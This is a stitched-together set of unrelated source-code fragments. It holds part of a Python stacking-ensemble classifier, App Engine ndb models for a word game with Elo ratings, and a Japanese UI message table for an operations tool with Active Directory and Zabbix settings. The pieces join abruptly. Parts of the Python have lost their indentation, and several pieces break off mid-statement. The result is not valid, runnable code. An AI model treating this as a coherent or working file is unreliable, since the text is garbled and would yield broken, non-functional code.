    Deprecated: use FullStackClassifier instead.
    """

    def __init__(self, base_models, ensembler, proba=True,
                 full_train=True, cv=None, n_jobs=1, verbose=0):
        self.base_models = list(base_models)
        self.ensembler = ensembler
        self.proba = proba
        self.full_train = full_train
        self.cv = cv
        self.n_jobs = n_jobs
        self.verbose = verbose
        # NOTE(review): mutating self.cv in __init__ breaks the sklearn
        # convention that __init__ only stores parameters; also this
        # KFold has no fixed random_state, so splits vary between runs.
        if self.cv is None:
            self.cv = KFold(n_splits=3, shuffle=True)
        warnings.warn('QuickStackClassifier is deprecated, '
                      'please use FullStackClassifier instead',
                      DeprecationWarning)

    def get_params(self, deep=True):
        # Delegate to the ensembler only: tuning this object (e.g. via
        # grid search) tunes the ensembler's few parameters, not the
        # (already tuned) base models.
        return self.ensembler.get_params(deep=deep)

    def set_params(self, **params):
        # See get_params: parameters are forwarded to the ensembler.
        return self.ensembler.set_params(**params)

    def _fit(self, X, y, *args, **kwargs):
        """
        private method to train n base models for last fold of cv
        """
        # get list of folds of indices; only the last (train, test)
        # split of the CV scheme is used
        self.last_fold = list(check_cv(self.cv).split(X, y))[-1]
        self.in_fold = self.last_fold[0]        # training indices
        self.out_of_fold = self.last_fold[-1]   # held-out indices
        # Paralellization: one job per base model
        parallel = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)
        # NOTE(review): the positional *args after keyword arguments in
        # the delayed(fit_model)(...) calls below will collide with the
        # 'model'/'X'/'y' keywords if args is non-empty -- TODO confirm
        # fit_model's signature tolerates extra positional args.
        if isinstance(X, pd.DataFrame):
            if not isinstance(y, (pd.Series, pd.DataFrame)):
                y = pd.DataFrame(y)
            self.fitted_models = parallel(delayed(fit_model)(
                model=deepcopy(model),
                X=X.iloc[self.in_fold],
                y=y.iloc[self.in_fold],
                *args,
                **kwargs
            ) for (_, model) in self.base_models
            )
        else:  # X is not a dataframe
            self.fitted_models = parallel(delayed(fit_model)(
                model=deepcopy(model),
                X=X[self.in_fold],
                y=force_array(y)[self.in_fold],
                *args,
                **kwargs
            ) for (_, model) in self.base_models
            )
        # train model with full 100% data (used at predict time when
        # full_train is True)
        if self.full_train:
            self.full_fitted_models = parallel(delayed(fit_model)(
                model=deepcopy(model),
                X=X,
                y=y,
                *args,
                **kwargs
            ) for (_, model) in self.base_models
            )

    def fit(self, X, y, *args, **kwargs):
        """
        fit method is the method for fitting the ensembler and the training
        data is out-of-fold predictions from base_models
        """
        # call _fit to train the base models on the in-fold data
        self._fit(X, y, *args, **kwargs)
        # generate out-of-sample predictions and reserve same order!!
        proba_dfs = []
        if isinstance(X, pd.DataFrame):
            for i, model in enumerate(self.fitted_models):
                # P(class=1) on the held-out fold; the frame is indexed
                # by the held-out *positions* so rows align with
                # y.iloc[self.out_of_fold] below
                df_proba = pd.DataFrame(
                    {'proba_{}'.format(i): model.predict_proba(X.iloc[self.out_of_fold])[:, 1]},  # noqa
                    index=self.out_of_fold
                )
                proba_dfs.append(df_proba)
        else:  # X is not a dataframe
            for i, model in enumerate(self.fitted_models):
                df_proba = pd.DataFrame(
                    {'proba_{}'.format(i): model.predict_proba(X[self.out_of_fold])[:, 1]},  # noqa
                    index=self.out_of_fold
                )
                proba_dfs.append(df_proba)
        # horizontal concat dfs and revert to origin order
        df_out_of_fold_pred = pd.concat(proba_dfs, axis=1)
        # if need to convert to predict (hard 0/1 at the 0.5 threshold)
        if not self.proba:
            df_out_of_fold_pred = df_out_of_fold_pred >= 0.5
        # Now train ensembler on the out-of-fold base model outputs
        if not isinstance(y, (pd.Series, pd.DataFrame)):
            y = pd.DataFrame(y)
        self.ensembler.fit(
            X=df_out_of_fold_pred,
            y=y.iloc[self.out_of_fold],
            *args, **kwargs
        )
        # signal done fitting (checked by check_is_fitted in predict_proba)
        self.fitted = True
        return self

    def predict_proba(self, X, *args, **kwargs):
        """Return the ensembler's predict_proba on the base model outputs."""
        check_is_fitted(self, 'fitted')
        # use full_trained model or not
        if self.full_train:
            base_models_list = self.full_fitted_models
        else:
            base_models_list = self.fitted_models
        # get pred from all base models
        proba_dfs = []
        for i, model in enumerate(base_models_list):
            df_proba = pd.DataFrame(
                {'proba_{}'.format(i): model.predict_proba(X)[:, 1]}
            )
            proba_dfs.append(df_proba)
        # horizontal concat P1 from all base models
        df_base_pred = pd.concat(proba_dfs, axis=1)
        if not self.proba:
            df_base_pred = df_base_pred >= 0.5
        # ensembler make predictions
        return self.ensembler.predict_proba(df_base_pred, *args, **kwargs)

    def predict(self, X, *args, **kwargs):
        """Return hard 0/1 predictions at the 0.5 probability threshold."""
        df_proba = self.predict_proba(X, *args, **kwargs)[:, 1]
        df_pred = df_proba >= 0.5
        return force_array(df_pred)
def _base_model_cross_val(model, X, y, cv=None, proba=True, *args, **kwargs):
"""
A private function that trains each base model for each fold
and outputs fitted base models, its out-of-fold predictions,
and array of y (in same order of out-of-fold predictions)
for fitting ensembler
Parameters
----------
model : object, base model
X : array-like, or dataframe
y : array-like, or dataframe
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross validation,
- integer, to specify the number of folds in a `(Stratified)KFold`,
- An object to be used as a cross-validation generator.
- An iterable yielding train, test splits.
proba : bool, if True, model will implement predict_proba when it
gets called
Returns
-------
list of fitted model for each fold, Xt(out-of-fold pred),
y(matched with Xt)
"""
# get list of folds of indices
all_folds = list(check_cv(cv).split(X, y))
# check data type
if not isinstance(X, (pd.DataFrame, pd.Series)):
X = pd.DataFrame(force_array(X))
if not isinstance(y, (pd.DataFrame, pd.Series)):
y = pd.DataFrame(force_array(y))
# iterate each train-fold and fit base model
fitted_models = [
fit_model(
model=deepcopy(model),
X=X.iloc[train],
y=y.iloc[train],
*args,
**kwargs
) for train, test in all_folds
]
# generate out-of-sample predictions and reserve same order!!
proba_dfs = []
for i, (train, test) in enumerate(all_folds):
df_proba = pd.DataFrame(
{'proba': fitted_models[i].predict_proba(X.iloc[test])[:, 1]}, # noqa
index=test
)
proba_dfs.append(df_proba)
# concat dfs, sort index, and record index
df_out_of_sample = pd.concat(proba_dfs).sort_index()
idx = df_out_of_sample.index.values
# get pred_out_of_sample
pred_out_of_sample = \
force_array(df_out_of_sample).reshape((len(df_out_of_sample), 1))
# if need to convert to predict
if not proba:
pred_out_of_sample | |
1
if 0 < max_len <= counter:
# Hit limit on returned users: stop iterating
return
# Return users with full names matching the prefix
q = cls.query(UserModel.name_lc >= prefix).order(UserModel.name_lc)
for ud in list_q(q, lambda um: um.name_lc or ""):
yield ud
counter += 1
if 0 < max_len <= counter:
# Hit limit on returned users: stop iterating
return
    @classmethod
    def list_similar_elo(cls, elo, max_len=40):
        """ List users with a similar (human) Elo rating

        Returns up to max_len user ids, drawn as evenly as possible
        from just below and at-or-above the given rating. Only users
        who have played at least one game are included.
        """
        # Start with max_len users with a lower Elo rating

        def fetch(q, max_len):
            """ Generator for returning query result keys """
            assert max_len > 0
            # pylint: disable=bad-continuation
            counter = 0  # Number of results already returned
            for k in iter_q(
                q, chunk_size=max_len, projection=['highest_score']
            ):
                if k.highest_score > 0:
                    # Has played at least one game: Yield the key value
                    yield k.key.id()
                    counter += 1
                    if counter >= max_len:
                        # Returned the requested number of records: done
                        return

        q = cls.query(UserModel.human_elo < elo).order(
            -UserModel.human_elo  # Descending order
        )
        lower = list(fetch(q, max_len))
        # Convert to an ascending list
        lower.reverse()
        # Repeat the query for same or higher rating
        q = cls.query(UserModel.human_elo >= elo).order(
            UserModel.human_elo  # Ascending order
        )
        higher = list(fetch(q, max_len))
        # Concatenate the upper part of the lower range with the
        # lower part of the higher range in the most balanced way
        # available (considering that either of the lower or upper
        # ranges may be empty or have fewer than max_len//2 entries)
        len_lower = len(lower)
        len_higher = len(higher)
        # Ideal balanced length from each range
        half_len = max_len // 2
        ix = 0  # Default starting index in the lower range
        if len_lower >= half_len:
            # We have enough entries in the lower range for a balanced
            # result, if the higher range allows
            # Move the start index
            ix = len_lower - half_len
        if len_higher < half_len:
            # We don't have enough entries in the upper range
            # to balance the result: move the beginning index down
            if ix >= half_len - len_higher:
                # Shift the entire missing balance to the lower range
                ix -= half_len - len_higher
            else:
                # Take as much slack as possible
                ix = 0
        # Concatenate the two slices into one result and return it
        assert max_len >= (len_lower - ix)
        result = lower[ix:] + higher[0:max_len - (len_lower - ix)]
        return result
class MoveModel(ndb.Model):
    """ Models a single move in a Game """

    # Board coordinate of the move; empty/None for moves that lay no
    # tiles on the board (see the tile-count logic in GameModel,
    # which only counts moves with a coord)
    coord = ndb.StringProperty()
    # The tiles involved in the move; may contain '?' markers,
    # presumably for blank tiles -- TODO confirm
    tiles = ndb.StringProperty()
    # Points scored by this move
    score = ndb.IntegerProperty(default=0)
    # The player's rack associated with the move -- whether this is the
    # rack before or after the move can't be told from here; verify
    rack = ndb.StringProperty(required=False, default=None)
    # When the move was made; optional for older entities
    timestamp = ndb.DateTimeProperty(required=False, default=None)
class GameModel(ndb.Model):
    """ Models a game between two users """

    # The players
    player0 = ndb.KeyProperty(kind=UserModel)
    player1 = ndb.KeyProperty(kind=UserModel)
    # The racks
    rack0 = ndb.StringProperty()
    rack1 = ndb.StringProperty()
    # The scores
    score0 = ndb.IntegerProperty()
    score1 = ndb.IntegerProperty()
    # Whose turn is it next, 0 or 1?
    to_move = ndb.IntegerProperty()
    # How difficult should the robot player be (if the opponent is a robot)?
    # None or 0 = most difficult
    robot_level = ndb.IntegerProperty(required=False, indexed=False, default=0)
    # Is this game over?
    over = ndb.BooleanProperty()
    # When was the game started?
    timestamp = ndb.DateTimeProperty(auto_now_add=True)
    # The timestamp of the last move in the game
    ts_last_move = ndb.DateTimeProperty(required=False, default=None)
    # The moves so far
    moves = ndb.LocalStructuredProperty(
        MoveModel, repeated=True, indexed=False)
    # The initial racks
    irack0 = ndb.StringProperty(required=False, default=None)
    irack1 = ndb.StringProperty(required=False, default=None)
    # Game preferences, such as duration, alternative bags or boards, etc.
    prefs = ndb.JsonProperty(required=False, default=None)
    # Count of tiles that have been laid on the board
    tile_count = ndb.IntegerProperty(
        required=False, indexed=False, default=None)
    # Elo statistics properties - only defined for finished games
    # Elo points of both players when game finished, before adjustment
    elo0 = ndb.IntegerProperty(required=False, indexed=False, default=None)
    elo1 = ndb.IntegerProperty(required=False, indexed=False, default=None)
    # Adjustment of Elo points of both players as a result of this game
    elo0_adj = ndb.IntegerProperty(required=False, indexed=False, default=None)
    elo1_adj = ndb.IntegerProperty(required=False, indexed=False, default=None)
    # Human-only Elo points of both players when game finished
    # (not defined if robot game)
    human_elo0 = ndb.IntegerProperty(
        required=False, indexed=False, default=None)
    human_elo1 = ndb.IntegerProperty(
        required=False, indexed=False, default=None)
    # Human-only Elo point adjustment as a result of this game
    human_elo0_adj = ndb.IntegerProperty(
        required=False, indexed=False, default=None)
    human_elo1_adj = ndb.IntegerProperty(
        required=False, indexed=False, default=None)

    def set_player(self, ix, user_id):
        """ Set a player key property to point to a given user, or None """
        # ix selects the player slot (0 or 1); any other value is
        # silently a no-op
        k = None if user_id is None else ndb.Key(UserModel, user_id)
        if ix == 0:
            self.player0 = k
        elif ix == 1:
            self.player1 = k

    @classmethod
    def fetch(cls, game_uuid, use_cache=True):
        """ Fetch a game entity given its uuid """
        if not use_cache:
            # Bypass both the in-context cache and the global cache
            return cls.get_by_id(game_uuid, use_cache=False, use_global_cache=False)
        # Default caching policy if caching is not explicitly prohibited
        return cls.get_by_id(game_uuid)

    @classmethod
    def list_finished_games(cls, user_id, versus=None, max_len=10):
        """ Query for a list of recently finished games for the given user

        If versus is given, only games against that opponent are
        returned. The result is a list of dicts, newest first, at most
        max_len long.
        """
        # NOTE(review): the assert is redundant with the following None
        # check (and is stripped under python -O)
        assert user_id is not None
        if user_id is None:
            return []

        def game_callback(gm):
            """ Map a game entity to a result dictionary with useful info about the game """
            game_uuid = gm.key.id()
            u0 = None if gm.player0 is None else gm.player0.id()
            u1 = None if gm.player1 is None else gm.player1.id()
            if u0 == user_id:
                # Player 0 is the source player, 1 is the opponent
                opp = u1
                sc0, sc1 = gm.score0, gm.score1
                elo_adj = gm.elo0_adj
                human_elo_adj = gm.human_elo0_adj
            else:
                # Player 1 is the source player, 0 is the opponent
                assert u1 == user_id
                opp = u0
                # Swap the scores so that sc0 is always the source player's
                sc1, sc0 = gm.score0, gm.score1
                elo_adj = gm.elo1_adj
                human_elo_adj = gm.human_elo1_adj
            return dict(
                uuid=game_uuid,
                ts=gm.timestamp,
                ts_last_move=gm.ts_last_move or gm.timestamp,
                opp=opp,
                robot_level=gm.robot_level,
                sc0=sc0,
                sc1=sc1,
                elo_adj=elo_adj,
                human_elo_adj=human_elo_adj,
                prefs=gm.prefs
            )

        k = ndb.Key(UserModel, user_id)
        if versus:
            # Add a filter on the opponent; two queries are needed since
            # the source user may be stored as player0 or player1
            v = ndb.Key(UserModel, versus)
            q0 = cls.query(ndb.AND(GameModel.player1 ==
                                   k, GameModel.player0 == v))
            q1 = cls.query(ndb.AND(GameModel.player0 ==
                                   k, GameModel.player1 == v))
        else:
            # Plain filter on the player
            q0 = cls.query(GameModel.player0 == k)
            q1 = cls.query(GameModel.player1 == k)
        # '== True' (rather than 'is True') is required by ndb's query
        # operator overloading
        # pylint: disable=singleton-comparison
        q0 = q0.filter(GameModel.over == True).order(-GameModel.ts_last_move)
        q1 = q1.filter(GameModel.over == True).order(-GameModel.ts_last_move)
        # Issue two asynchronous queries in parallel
        qf = (q0.fetch_async(max_len), q1.fetch_async(max_len))
        # Wait for both of them to finish
        ndb.Future.wait_all(qf)
        # Combine the two query result lists and call game_callback() on each item
        rlist = map(game_callback, qf[0].get_result() + qf[1].get_result())
        # Return the newest max_len games
        return sorted(rlist, key=lambda x: x["ts_last_move"], reverse=True)[0:max_len]

    @classmethod
    def iter_live_games(cls, user_id, max_len=10):
        """ Query for a list of active games for the given user

        Generator yielding up to max_len result dicts, most recently
        active games first.
        """
        # NOTE(review): the assert is redundant with the following None
        # check (and is stripped under python -O)
        assert user_id is not None
        if user_id is None:
            return
        k = ndb.Key(UserModel, user_id)
        # pylint: disable=singleton-comparison
        q = (
            cls
            .query(ndb.OR(GameModel.player0 == k, GameModel.player1 == k))
            .filter(GameModel.over == False)
            .order(-GameModel.ts_last_move)
        )

        def game_callback(gm):
            """ Map a game entity to a result tuple with useful info about the game """
            game_uuid = gm.key.id()
            u0 = None if gm.player0 is None else gm.player0.id()
            u1 = None if gm.player1 is None else gm.player1.id()
            if u0 == user_id:
                # Player 0 is the source player, 1 is the opponent
                opp = u1
                sc0, sc1 = gm.score0, gm.score1
                my_turn = gm.to_move == 0
            else:
                # Player 1 is the source player, 0 is the opponent
                assert u1 == user_id
                opp = u0
                # Swap the scores so that sc0 is always the source player's
                sc1, sc0 = gm.score0, gm.score1
                my_turn = gm.to_move == 1
            # Obtain a count of the tiles that have been laid down
            tc = gm.tile_count
            if tc is None:
                # Not stored: we must count the tiles manually
                # This will not be 100% accurate as tiles will be double-counted
                # if they are a part of two words
                tc = 0
                for m in gm.moves:
                    if m.coord:
                        # Normal tile move: count the tiles laid down,
                        # excluding '?' markers (presumably blank-tile
                        # designators -- TODO confirm)
                        tc += len(m.tiles.replace(u'?', u''))
            return dict(
                uuid=game_uuid,
                ts=gm.ts_last_move or gm.timestamp,
                opp=opp,
                robot_level=gm.robot_level,
                my_turn=my_turn,
                sc0=sc0,
                sc1=sc1,
                prefs=gm.prefs,
                tile_count=tc
            )

        for gm in q.fetch(max_len):
            yield game_callback(gm)
class FavoriteModel(ndb.Model):
""" Models the fact that a user has marked another user as a favorite """
MAX_FAVORITES = 100 # The maximum number of favorites that a user can have
# The originating (source) user | |
\n00から23の数値を入力してください。"
Ary['MOSEN22030'] = "AD連携タイマーの設定に失敗しました。"
Ary['MOSEN22031'] = "メール通知種別を選択してください。"
Ary['MOSEN22032'] = "ログインIDが不正です。修正してください。"
Ary['MOSEN22033'] = "AD連携解除を行っています。"
Ary['MOSEN22034'] = "処理が終了しました。"
Ary['MOSEN22035'] = "システム設定が保存されました。"
Ary['MOSEN22036'] = "存在しないログインIDが入力されています。(%(ids)s) 修正してください。"
Ary['MOSEN22037'] = "初回AD連携処理を行っています。処理が完了するまで、ブラウザを閉じたり、別ページに移動しないでください"
Ary['MOSEN22038'] = "AD連携解除に失敗しました。"
Ary['MOSEN22039'] = "初回AD連携に失敗しました。設定情報と接続先に問題がないか確認してください。"
Ary['MOSEN22040'] = "AD連携設定を行います。\n現在登録中のグループ・ユーザ情報が全て削除され、\nADから取得したグループ・ユーザを設定します。\nよろしいですか?"
Ary['MOSEN22041'] = "AD連携設定中です。"
Ary['MOSEN22042'] = "AD連携を中断しました。"
Ary['MOSEN22043'] = "入力情報が破棄されます。よろしいですか?"
Ary['MOSEN22044'] = "システム設定"
Ary['MOSEN22045'] = "ログ設定"
Ary['MOSEN22046'] = "認証設定"
Ary['MOSEN22047'] = "パスワード設定"
Ary['MOSEN22048'] = "Active Directory設定"
Ary['MOSEN22049'] = "ログ保存期間設定"
Ary['MOSEN22050'] = "日"
Ary['MOSEN22051'] = "セッション設定"
Ary['MOSEN22052'] = "分"
Ary['MOSEN22053'] = "パスワード関連設定"
Ary['MOSEN22054'] = "日間"
Ary['MOSEN22055'] = "世代"
Ary['MOSEN22056'] = "回"
Ary['MOSEN22057'] = "時間"
Ary['MOSEN22058'] = "管理者(administrator)のみ"
Ary['MOSEN22059'] = "管理者(administrator)+ユーザ更新権限のあるユーザ"
Ary['MOSEN22060'] = "管理者(administrator)+ログインID指定"
Ary['MOSEN22061'] = "Active Directory関連設定"
Ary['MOSEN22062'] = "未連携"
Ary['MOSEN22063'] = "連携中"
Ary['MOSEN22064'] = "属性値"
Ary['MOSEN22065'] = "所属部署名"
Ary['MOSEN22066'] = "秒"
Ary['MOSEN22067'] = "全てリセット"
Ary['MOSEN22068'] = "行追加"
Ary['MOSEN22069'] = "行削除"
Ary['MOSEN22070'] = "AD連携設定"
Ary['MOSEN22071'] = "エラー"
Ary['MOSEN22072'] = "無効"
Ary['MOSEN23000'] = "グループ"
Ary['MOSEN23001'] = "グループが存在しません。<br />権限がある場合は、[編集]をクリックするとグループを作成できます。"
Ary['MOSEN23002'] = "権限"
Ary['MOSEN23003'] = "グループ名"
Ary['MOSEN23004'] = "概要"
Ary['MOSEN23005'] = "最終更新者"
Ary['MOSEN23006'] = "最終更新日時"
Ary['MOSEN23007'] = "対象データがありません。"
Ary['MOSEN23008'] = "更新"
Ary['MOSEN23009'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN23010'] = "リセットします。\nよろしいですか?"
Ary['MOSEN23011'] = "必須項目(グループ名)が入力されていません。入力してください。"
Ary['MOSEN23012'] = "グループ名は64文字以内で入力してください。"
Ary['MOSEN23013'] = "概要は4000文字以内で入力してください。"
Ary['MOSEN23014'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN23015'] = "更新対象のデータがありません。"
Ary['MOSEN23016'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN23017'] = "エラーが発生しました。"
Ary['MOSEN23018'] = "データ取得に失敗しました。"
Ary['MOSEN23019'] = "不正なリクエストです。"
Ary['MOSEN23020'] = "他のグループ名と重複しています。修正してください。"
Ary['MOSEN23021'] = "DBの更新に失敗しました。"
Ary['MOSEN23022'] = "グループが存在しません。<br />Active Directoryでグループ作成をしてください。"
Ary['MOSEN23023'] = "のグループは削除が選択されています。\n所属するグループがなくなったユーザも削除されます。\n\n保存してもよろしいですか?"
Ary['MOSEN23024'] = "%(strCol)sに使用できない文字が含まれています。"
Ary['MOSEN23025'] = "グループ名「システム管理者」は変更できません。"
Ary['MOSEN23026'] = "アクセス権限を変更します。"
Ary['MOSEN23027'] = "変更内容を保存しますか?"
Ary['MOSEN23028'] = "アクセス権限"
Ary['MOSEN23029'] = "権限の設定"
Ary['MOSEN23030'] = "システム"
Ary['MOSEN23031'] = "System Settngs"
Ary['MOSEN23032'] = "User"
Ary['MOSEN23033'] = "Action Settings"
Ary['MOSEN23034'] = "システム管理者"
Ary['MOSEN23035'] = "全て表示"
Ary['MOSEN23036'] = "監視アダプタ"
Ary['MOSEN23037'] = "グループ名に使用できない文字が含まれています。"
Ary['MOSEN23038'] = "概要に使用できない文字が含まれています。"
Ary['MOSEN24000'] = "不正なリクエストです。"
Ary['MOSEN24001'] = "データ取得に失敗しました。"
Ary['MOSEN24002'] = "入力値が不正です。"
Ary['MOSEN24003'] = "対象データがありません。"
Ary['MOSEN24004'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN24005'] = "必須項目(ユーザ名)が入力されていません。入力してください。"
Ary['MOSEN24006'] = "必須項目(ログインID)が入力されていません。入力してください。"
Ary['MOSEN24007'] = "必須項目(メールアドレス)が入力されていません。入力してください。"
Ary['MOSEN24008'] = "必須項目(グループ)が選択されていません。選択してください。"
Ary['MOSEN24009'] = "ユーザが存在しません。<br />Active Directoryでユーザ作成をしてください。"
Ary['MOSEN24010'] = "ユーザが存在しません。<br />権限がある場合は、[編集]をクリックするとユーザを作成できます。"
Ary['MOSEN24011'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN24012'] = "ログインIDは32文字以内で入力してください。"
Ary['MOSEN24013'] = "メールアドレスは256文字以内で入力してください。"
Ary['MOSEN24014'] = "メールアドレスが不正です。修正してください。"
Ary['MOSEN24015'] = "エラーが発生しました。"
Ary['MOSEN24016'] = "存在しないグループを追加しようとしています。"
Ary['MOSEN24017'] = "他のログインIDと重複しています。修正してください。"
Ary['MOSEN24018'] = "他のメールアドレスと重複しています。修正してください。"
Ary['MOSEN24019'] = "存在しないグループを削除しようとしています。"
Ary['MOSEN24020'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN24021'] = "ログインIDが不正です。使用可能文字は半角英字(大文字)、半角英字(小文字)、半角数字、記号 . @ _ -です。"
Ary['MOSEN24022'] = "%(strConName)sに使用できない文字が含まれています。"
Ary['MOSEN24023'] = "グループ画面で作成したグループを選択してください。\n1ユーザに対して複数のグループを紐付することができます。"
Ary['MOSEN24024'] = "ユーザ"
Ary['MOSEN24025'] = "グループの選択"
Ary['MOSEN24026'] = "ユーザ名:"
Ary['MOSEN24027'] = "所属するグループを選択してください。"
Ary['MOSEN24028'] = "グループ"
Ary['MOSEN24029'] = "グループを選択してください。"
Ary['MOSEN25000'] = "メールテンプレートが存在しません。<br />権限がある場合は、[新規追加]をクリックするとメールテンプレートを作成できます。"
Ary['MOSEN25001'] = "対象データがありません。"
Ary['MOSEN25002'] = "更新対象のデータがありません。"
Ary['MOSEN25003'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN25004'] = "必須項目(テンプレート名)が入力されていません。"
Ary['MOSEN25005'] = "必須項目(件名)が入力されていません。"
Ary['MOSEN25006'] = "必須項目(本文)が入力されていません。"
Ary['MOSEN25007'] = "テンプレート名は64文字以内で入力してください。"
Ary['MOSEN25008'] = "件名は128文字以内で入力してください。"
Ary['MOSEN25009'] = "本文は512文字以内で入力してください。"
Ary['MOSEN25010'] = "宛先は512文字以内で入力してください。"
Ary['MOSEN25011'] = "CCは512文字以内で入力してください。"
Ary['MOSEN25012'] = "BCCは512文字以内で入力してください。"
Ary['MOSEN25013'] = "他のテンプレート名と重複しています。修正してください。"
Ary['MOSEN25014'] = "宛先のメールアドレスが不正です。修正してください。"
Ary['MOSEN25015'] = "CCのメールアドレスが不正です。修正してください。"
Ary['MOSEN25016'] = "BCCのメールアドレスが不正です。修正してください。"
Ary['MOSEN25017'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN25018'] = "エラーが発生しました。"
Ary['MOSEN25019'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN25020'] = "テンプレート名に使用できない文字が含まれています。"
Ary['MOSEN25021'] = "件名に使用できない文字が含まれています。"
Ary['MOSEN25022'] = "本文に使用できない文字が含まれています。"
Ary['MOSEN25023'] = "宛先に使用できない文字が含まれています。"
Ary['MOSEN25024'] = "CCに使用できない文字が含まれています。"
Ary['MOSEN25025'] = "BCCに使用できない文字が含まれています。"
Ary['MOSEN25026'] = "アクション設定に戻る"
Ary['MOSEN25027'] = "件名"
Ary['MOSEN25028'] = "メールテンプレート新規追加"
Ary['MOSEN25029'] = "テンプレート名"
Ary['MOSEN25030'] = "宛先"
Ary['MOSEN25031'] = "CC"
Ary['MOSEN25032'] = "BCC"
Ary['MOSEN25033'] = "本文"
Ary['MOSEN25034'] = "メールテンプレート詳細"
Ary['MOSEN25035'] = "メールテンプレート編集"
Ary['MOSEN25036'] = "この内容で保存して宜しいですか?\n保存しない場合は、[キャンセル]をクリックしてください。"
Ary['MOSEN25037'] = "メールテンプレートを削除して宜しいですか?\n削除しない場合は、[キャンセル]をクリックしてください。"
Ary['MOSEN26001'] = "保存されました。"
Ary['MOSEN26002'] = "入力値が不正です。"
Ary['MOSEN26003'] = "エラーが発生しました。"
Ary['MOSEN26004'] = "監視アダプタ"
Ary['MOSEN26005'] = "監視先の追加"
Ary['MOSEN26006'] = "監視先の選択"
Ary['MOSEN26007'] = "アダプタがインストールされていません。<br />アダプタをインストールすると監視情報が表示されます。"
Ary['MOSEN26008'] = "データ取得に失敗しました。"
Ary['MOSEN26009'] = "不正なリクエストです。"
Ary['MOSEN26010'] = "DBの更新に失敗しました。"
Ary['MOSEN26011'] = "戻る"
Ary['MOSEN26101'] = "データの削除に失敗しました。"
Ary['MOSEN26102'] = "必須項目(名前)が入力されていません。入力してください。"
Ary['MOSEN26103'] = "名前は64文字以内で入力してください。"
# --- Japanese UI message table (message ID -> text) -------------------------
# MOSEN261xx: ZABBIX monitoring-adapter settings — validation errors, field
# labels and confirmation dialogs.
Ary['MOSEN26104'] = "名前に使用できない文字が含まれています。"
Ary['MOSEN26105'] = "必須項目(プロトコル)が入力されていません。入力してください。"
Ary['MOSEN26106'] = "プロトコルは64文字以内で入力してください。"
Ary['MOSEN26107'] = "必須項目(ホスト名)が入力されていません。入力してください。"
Ary['MOSEN26108'] = "ホスト名は128文字以内で入力してください。"
Ary['MOSEN26109'] = "ホスト名に使用できない文字が含まれています。"
Ary['MOSEN26110'] = "必須項目(ポート)が入力されていません。入力してください。"
Ary['MOSEN26111'] = "ポートは、0~65535までの数値を入力してください。"
Ary['MOSEN26112'] = "必須項目(ユーザ名)が入力されていません。入力してください。"
Ary['MOSEN26113'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN26114'] = "ユーザ名に使用できない文字が含まれています。"
Ary['MOSEN26115'] = "必須項目(パスワード)が入力されていません。入力してください。"
Ary['MOSEN26116'] = "パスワードは64文字以内で入力してください。"
Ary['MOSEN26117'] = "パスワードに使用できない文字が含まれています。"
Ary['MOSEN26118'] = "必須項目(ルール種別)が選択されていません。選択してください。"
Ary['MOSEN26119'] = "ルール種別が存在しません。ディシジョンテーブル画面からファイルをダウンロードし、ルールの設定を行ってください。"
Ary['MOSEN26120'] = "必須項目(条件名)が入力されていません。入力してください。"
Ary['MOSEN26121'] = "保存されている条件名の数と入力されたZabbix項目の数が違います。もう一度お試しください。再度同じエラーが発生している場合はOASEシステムの管理者へご連絡ください。"
Ary['MOSEN26122'] = "必須項目(Zabbix項目)が入力されていません。入力してください。"
Ary['MOSEN26123'] = "Zabbix項目に使用できない文字が含まれています。"
Ary['MOSEN26124'] = "他のZABBIXアダプタ名と重複しています。修正してください。"
Ary['MOSEN26125'] = "他のホスト名と重複しています。修正してください。"
Ary['MOSEN26126'] = "ZABBIXの疎通確認に失敗しました。"
Ary['MOSEN26127'] = "データは既に削除されています。再読み込みしてください。"
Ary['MOSEN26128'] = "Zabbix項目は32文字以内で入力してください。"
Ary['MOSEN26129'] = "名前"
Ary['MOSEN26130'] = "プロトコル"
Ary['MOSEN26131'] = "ホスト/IP"
Ary['MOSEN26132'] = "ポート"
Ary['MOSEN26133'] = "ユーザ名"
Ary['MOSEN26134'] = "ルール種別"
Ary['MOSEN26135'] = "突合情報"
Ary['MOSEN26136'] = "条件名"
Ary['MOSEN26137'] = "Zabbix項目"
Ary['MOSEN26138'] = "パスワード"
Ary['MOSEN26139'] = "ルール種別選択"
Ary['MOSEN26140'] = "ルール種別を選択してください。"
Ary['MOSEN26141'] = "未入力エラー"
Ary['MOSEN26142'] = "ルールが削除されています。ルールを選び直してください。"
Ary['MOSEN26143'] = "監視先が設定されていません。<br />権限がある場合は、[監視先の追加]をクリックすると設定編集できます。"
Ary['MOSEN26144'] = "条件に対応させるZabbix項目名を入力してください。"
Ary['MOSEN26145'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN26146'] = "削除すると設定されている監視基盤へのメッセージ取得を行わなくなります。\n保存してもよろしいですか?"
Ary['MOSEN26147'] = "Zabbix項目に設定されていない文字が指定されています。"
# MOSEN270xx: action-settings screen — common dialogs, errors and labels.
Ary['MOSEN27001'] = "編集内容を保存します。\nよろしいですか?"
Ary['MOSEN27002'] = "のアクション設定は削除が選択されています。\nルールに記載されているアクションでも実行できなくなります。\n\n保存してもよろしいですか?"
Ary['MOSEN27003'] = "入力値が不正です。"
Ary['MOSEN27004'] = "対象データがありません。"
Ary['MOSEN27005'] = "エラーが発生しました。"
Ary['MOSEN27006'] = "入力情報が破棄されます。\nよろしいですか?"
Ary['MOSEN27007'] = "アクション用ドライバが設定されていません。"
Ary['MOSEN27008'] = "データ取得に失敗しました。"
Ary['MOSEN27009'] = "DBの更新に失敗しました。"
Ary['MOSEN27010'] = "不正なリクエストです。"
Ary['MOSEN27011'] = "アクション設定が存在しません。<br />権限がある場合は、[編集]をクリックすると設定編集できます。"
